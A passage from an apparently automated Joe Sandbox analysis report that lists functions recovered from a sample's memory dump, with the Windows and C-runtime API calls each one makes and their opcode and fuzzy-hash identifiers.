                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: __lock_file_memset
                                                • String ID:
                                                • API String ID: 26237723-0
                                                • Opcode ID: 8bdf451d5685cc2f81a2fd6268743364dd35c933aed39b872b4fea227f252041
                                                • Instruction ID: 57ba7a700220a4d3a71d3b217ef9610dad6a706a1ff04c0b9842fd72f0f9446a
                                                • Opcode Fuzzy Hash: 8bdf451d5685cc2f81a2fd6268743364dd35c933aed39b872b4fea227f252041
                                                • Instruction Fuzzy Hash: E9018431801A19EBCF12AFA9BC0949E7B62FF91360F148215F8245A151D7398A21DB92
                                                APIs
                                                  • Part of subcall function 00798CA8: __getptd_noexit.LIBCMT ref: 00798CA8
                                                • __lock_file.LIBCMT ref: 0079555B
                                                  • Part of subcall function 00796D8E: __lock.LIBCMT ref: 00796DB1
                                                • __fclose_nolock.LIBCMT ref: 00795566
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                • String ID:
                                                • API String ID: 2800547568-0
                                                • Opcode ID: e22703a72b10a14a866dabc2083baf5abd1408c76b8edb261a6344601a94f4f1
                                                • Instruction ID: d9031d76660af5ed5bd6218d8830760b67d256db7ac91dc96c7475c0f789460c
                                                • Opcode Fuzzy Hash: e22703a72b10a14a866dabc2083baf5abd1408c76b8edb261a6344601a94f4f1
                                                • Instruction Fuzzy Hash: 75F0B471901A20DBDF527F75BC0A76E67A3AF42331F268209F424AB1C2CB7C49419B56
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ef94ce616c4c6930aa3f97d8123287fbd9fbc3e79cd9ce241e70ea490035aded
                                                • Instruction ID: 2e619bf881b072fa20018f3aee64ff987cf504f0d3121ab8d6df51686a9c85ed
                                                • Opcode Fuzzy Hash: ef94ce616c4c6930aa3f97d8123287fbd9fbc3e79cd9ce241e70ea490035aded
                                                • Instruction Fuzzy Hash: A1518034700604EFCF14EB54C999FAD77A6AF45760F148468FA4AAB392DB38ED01CB51
                                                APIs
                                                • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00775CF6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: f2f64a3ba486351c5cb4cece968a0267c57b9dbc93ee0b8bdf080b62845e2edd
                                                • Instruction ID: c722f476ec0879ae92bc33289775bd77b6863927b744925120d50e527b75479c
                                                • Opcode Fuzzy Hash: f2f64a3ba486351c5cb4cece968a0267c57b9dbc93ee0b8bdf080b62845e2edd
                                                • Instruction Fuzzy Hash: F2313C71A00B0AEBCF18DF29C48466DB7B5FF48350F15C629E81993710D7B5AD60DB90
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction ID: ec4129fb1d1170d826740c5f9fd2e3a91be0827115d25f705620cf8d45795029
                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction Fuzzy Hash: 9831B175A101059FCB18EF58E484969FBB6FF49300B688AA5E40ACB655DB35EDC1CBC0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID:
                                                • API String ID: 1473721057-0
                                                • Opcode ID: b2420dcedb9f77b8f15caef758e6385dc8b0ea07391444a5b27b32f55cd70dbb
                                                • Instruction ID: 9f804acdb9b743ff8bcc14883134c0ca7ba2276e6875e1fd4d18ced366616280
                                                • Opcode Fuzzy Hash: b2420dcedb9f77b8f15caef758e6385dc8b0ea07391444a5b27b32f55cd70dbb
                                                • Instruction Fuzzy Hash: 6D414B70508341DFDB24DF14C488B1ABBE1BF84354F0988ACE9898B362D73AE845CB92
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: d1804af4368f735451a106a09b075585887c8acb712456119fb31bc3140c2fd3
                                                • Instruction ID: a9bfa4c2bf63ee3c62e824cbef8c17f8895619f4c10542c572417b5e25d543af
                                                • Opcode Fuzzy Hash: d1804af4368f735451a106a09b075585887c8acb712456119fb31bc3140c2fd3
                                                • Instruction Fuzzy Hash: 21214872604A08EBCF285F61FC4176A7BB8FF55390F21C62EE48AC5092EB3890D1D754
                                                APIs
                                                  • Part of subcall function 00774D13: FreeLibrary.KERNEL32(00000000,?), ref: 00774D4D
                                                  • Part of subcall function 007953CB: __wfsopen.LIBCMT ref: 007953D6
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008352F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00774F6F
                                                  • Part of subcall function 00774CC8: FreeLibrary.KERNEL32(00000000), ref: 00774D02
                                                  • Part of subcall function 00774DD0: _memmove.LIBCMT ref: 00774E1A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Library$Free$Load__wfsopen_memmove
                                                • String ID:
                                                • API String ID: 1396898556-0
                                                • Opcode ID: 8bfad51c166bdac0fef0de9a49fc09577b964891c9073434021978d895d38394
                                                • Instruction ID: 59b81f738ffebba17a2055088de03fcd75e5efb9055edb93a85af528e185a2ab
                                                • Opcode Fuzzy Hash: 8bfad51c166bdac0fef0de9a49fc09577b964891c9073434021978d895d38394
                                                • Instruction Fuzzy Hash: B511E732700709EBCF25AF70CC1AB6E77A59F41750F10C829F945A6281DFB99E15DBA0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID:
                                                • API String ID: 1473721057-0
                                                • Opcode ID: 146d87f067cb1b6ce6b6779c14546ff3d844492454f744ad081584bffb02aef7
                                                • Instruction ID: 5c6083656ba67a65de036daeb8303059d63ebb0a0b062b746e94075e95588f1f
                                                • Opcode Fuzzy Hash: 146d87f067cb1b6ce6b6779c14546ff3d844492454f744ad081584bffb02aef7
                                                • Instruction Fuzzy Hash: BD212FB0508341DFEB24DF24C849B1BBBE1BF88354F048968F99A87721D739E815CB92
                                                APIs
                                                • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00775807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00775D76
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 73a1355b031bdc75a771e0f09f8854f265dd8209c4e8e2a9650f0b5825a3778a
                                                • Instruction ID: fa644a9d3aada5004393675322d46a142ac03c9ae3c2a67986e11b954027c1c2
                                                • Opcode Fuzzy Hash: 73a1355b031bdc75a771e0f09f8854f265dd8209c4e8e2a9650f0b5825a3778a
                                                • Instruction Fuzzy Hash: 0B113631300B059FDB308F55C888B62B7E9EF457A0F10C92EE4AE86A50D7B8F945CB60
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 1c38cca95f6358379de2d9c40b720d035e2a3922818e7d4ef8cb35a2f7d1b5e5
                                                • Instruction ID: 0ecb0bb5abcd58d92a819266e6137a5066fa5f9c3eda6ca23391faa589e60f0d
                                                • Opcode Fuzzy Hash: 1c38cca95f6358379de2d9c40b720d035e2a3922818e7d4ef8cb35a2f7d1b5e5
                                                • Instruction Fuzzy Hash: B501D672214701AEDB249B28DC06E67BBA89B447A0F10C92AF51ACA191EA39E501CB90
                                                APIs
                                                • __lock_file.LIBCMT ref: 00794A16
                                                  • Part of subcall function 00798CA8: __getptd_noexit.LIBCMT ref: 00798CA8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: __getptd_noexit__lock_file
                                                • String ID:
                                                • API String ID: 2597487223-0
                                                • Opcode ID: a2195f2eff0e4b41dbd50f90602eb3cf748cfa47c96699bc601cef02ff382a26
                                                • Instruction ID: bb0cabfff39aa4b64e8001d6ec2a4c133b805e061003347c722d05fb2b94fba2
                                                • Opcode Fuzzy Hash: a2195f2eff0e4b41dbd50f90602eb3cf748cfa47c96699bc601cef02ff382a26
                                                • Instruction Fuzzy Hash: 48F0AF31950205EBDF51AF74EC0EB9E36A1EF02325F04C514F424AA191DB7C8952DB56
                                                APIs
                                                • FreeLibrary.KERNEL32(?,?,008352F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00774FDE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: cb3106769eea5a264f69e2970849040a64c9a5e46f3c7120eacb2e956c6252c0
                                                • Instruction ID: e50b36d2ec1797e219bc3c32cb2b828f7554773aaab042a6b33411e07256e435
                                                • Opcode Fuzzy Hash: cb3106769eea5a264f69e2970849040a64c9a5e46f3c7120eacb2e956c6252c0
                                                • Instruction Fuzzy Hash: 30F03971105712CFCF349F74E494822BBE2AF04369329CE3EE1DA82610C739A850DF40
                                                APIs
                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00790930
                                                  • Part of subcall function 00777D2C: _memmove.LIBCMT ref: 00777D66
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: LongNamePath_memmove
                                                • String ID:
                                                • API String ID: 2514874351-0
                                                • Opcode ID: 0a797a59ca221a0638183b5e0532dbda79cbdb3051eea28ee7f439926632c0f0
                                                • Instruction ID: c96bb59a562dbf5c061295e7e77d36baba5ae7336c89fd42a9efaf0c90aa9a83
                                                • Opcode Fuzzy Hash: 0a797a59ca221a0638183b5e0532dbda79cbdb3051eea28ee7f439926632c0f0
                                                • Instruction Fuzzy Hash: 67E08636A0522897C720D6989C09FFA77EDDF89690F0441B5FC0CD7204D9645C81C690
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: __fread_nolock
                                                • String ID:
                                                • API String ID: 2638373210-0
                                                • Opcode ID: 87e92921201f7f350e3b6a5d32947fae34ea2a0dab1f5900b9b8b54ddfacd81a
                                                • Instruction ID: afdb62224a443c59c75524bb2e3fddd768c6c49dae6b4f5e4b77d23a20eee1d4
                                                • Opcode Fuzzy Hash: 87e92921201f7f350e3b6a5d32947fae34ea2a0dab1f5900b9b8b54ddfacd81a
                                                • Instruction Fuzzy Hash: 10E012B1604B009BDB758B24D8517A377E1AB05315F00095DF69AD3341EB67B845CB59
                                                APIs
                                                  • Part of subcall function 007D339D: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,?,?,007D34AA,?,?,?,007ADF90,008255C0,00000002,?,?), ref: 007D341B
                                                • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,007ADF90,008255C0,00000002,?,?,?,?), ref: 007D34B8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: File$PointerWrite
                                                • String ID:
                                                • API String ID: 539440098-0
                                                • Opcode ID: 8b30e4a8eb209d45d8c626c7b013aa39ba9a5b43c226422ff64b6bd5e8d28206
                                                • Instruction ID: 7901ffc9e5876d19a7ad557ab9beb1f66589a3996532fff2443f04bc96728da1
                                                • Opcode Fuzzy Hash: 8b30e4a8eb209d45d8c626c7b013aa39ba9a5b43c226422ff64b6bd5e8d28206
                                                • Instruction Fuzzy Hash: A1E04636400208FBDB20AF94D905FDAB7BCEF04320F00465BF94082110DBB6AE249BA1
                                                APIs
                                                • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,007AE09B,?,?,00000000), ref: 00775DBF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 52ac02037b256388738680abd102de84a88f3f1252960504f7a91d23dc3a7383
                                                • Instruction ID: bdba75955cf4b729fa2700b0156a836cba8f65e270e8423260e18e47129c874a
                                                • Opcode Fuzzy Hash: 52ac02037b256388738680abd102de84a88f3f1252960504f7a91d23dc3a7383
                                                • Instruction Fuzzy Hash: 4FD0C77464020CBFE710DB80DC46FAD777CDB05710F100195FD0456390D6B27D508795
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: __wfsopen
                                                • String ID:
                                                • API String ID: 197181222-0
                                                • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                • Instruction ID: fe0b7ed47a877b8b285810205fa42e44a0156fd85e84d358d5755067fda8220c
                                                • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                • Instruction Fuzzy Hash: A3B0927644020CB7CE022A82FC02A493B599B407A8F408020FB0C181A2A6B7A6649689
                                                APIs
                                                • GetLastError.KERNEL32(00000002,00000000), ref: 007DD28B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ErrorLast
                                                • String ID:
                                                • API String ID: 1452528299-0
                                                • Opcode ID: f1924a885d39a7d0494e1f8a475db92198a9ee6a9c57f02fe08ff3b8fec2bbb5
                                                • Instruction ID: 4c9ccedf70ea23fada0d57be30c2d25e812a0d4936dc06c05494219e0a0af170
                                                • Opcode Fuzzy Hash: f1924a885d39a7d0494e1f8a475db92198a9ee6a9c57f02fe08ff3b8fec2bbb5
                                                • Instruction Fuzzy Hash: 1B713C30604301CFCB14EF24C595A6AB7F4AF88754F04896DF59A9B3A1DB78ED09CB52
                                                APIs
                                                • CloseHandle.KERNELBASE(?,?,?,00775921,?,00776C37), ref: 00775DEF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID:
                                                • API String ID: 2962429428-0
                                                • Opcode ID: d9d2092d565d0527e3d13b808e38e134390a493ac4f073bfe35b574d351e10cd
                                                • Instruction ID: 191b5e83c2f2f363ecd6cd597246dbd69d0447df749ef054c242a62d03742422
                                                • Opcode Fuzzy Hash: d9d2092d565d0527e3d13b808e38e134390a493ac4f073bfe35b574d351e10cd
                                                • Instruction Fuzzy Hash: 68E0B679500B01CFD7314F1AE848422FBF5FFE13A13248A2FD4EA82660D7B5589ACB50
                                                APIs
                                                  • Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623
                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 007FCBA1
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007FCBFF
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007FCC40
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007FCC6A
                                                • SendMessageW.USER32 ref: 007FCC93
                                                • _wcsncpy.LIBCMT ref: 007FCCFF
                                                • GetKeyState.USER32(00000011), ref: 007FCD20
                                                • GetKeyState.USER32(00000009), ref: 007FCD2D
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007FCD43
                                                • GetKeyState.USER32(00000010), ref: 007FCD4D
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007FCD76
                                                • SendMessageW.USER32 ref: 007FCD9D
                                                • SendMessageW.USER32(?,00001030,?,007FB37C), ref: 007FCEA1
